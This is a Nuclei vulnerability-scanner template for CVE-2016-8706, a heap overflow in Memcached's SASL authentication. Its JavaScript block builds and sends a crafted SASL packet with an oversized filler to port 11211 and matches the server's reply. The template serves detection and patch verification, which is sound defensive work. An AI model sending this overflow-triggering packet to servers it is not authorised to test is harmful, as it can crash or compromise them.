nuclei-templates/javascript/cves/2016/CVE-2016-8706.yaml

57 lines
1.9 KiB
YAML

id: CVE-2016-8706
info:
name: Memcached Server SASL Authentication - Remote Code Execution
author: pussycat0x
severity: high
description: |
An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.
reference:
- https://github.com/Medicean/VulApps/blob/master/m/memcached/cve-2016-8706/poc.py
- https://nvd.nist.gov/vuln/detail/CVE-2016-8706
- http://rhn.redhat.com/errata/RHSA-2016-2819.html
- http://www.debian.org/security/2016/dsa-3704
- http://www.securitytracker.com/id/1037333
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2016-8706
cwe-id: CWE-190
epss-score: 0.89998
epss-percentile: 0.98714
cpe: cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: memcached
product: memcached
verfied: true
tags: cve,cve2016,rce,js,memcached
javascript:
- code: |
let packet = bytes.NewBuffer();
packet.Write(new Uint8Array([0x80, 0x21]))
let cmd = 'stats'
packet.WriteString(cmd)
packet.Pack("!H", [32]);
packet.Pack("!I", [1]);
let buzz = Array(1000).fill("A").join('');
packet.WriteString(buzz)
const c = require("nuclei/net");
let conn = c.Open('tcp', `${Host}:${Port}`);
conn.SendHex(packet.Hex());
conn.RecvString();
args:
Host: "{{Host}}"
Port: 11211
matchers-condition: and
matchers:
- type: word
words:
- "Invalid arguments"
- type: word
words:
- "Auth failure"
negative: true
# digest: 490a0046304402202b779e50c06772457c979559413b9c9ed1174a52656ee40abb96ea3a6fad1dc4022051980afb07dd370ab8740389b2a2fd654ee21d9e3534428f834520a9f47cab79:922c64590222798bb761d5b6d8e72950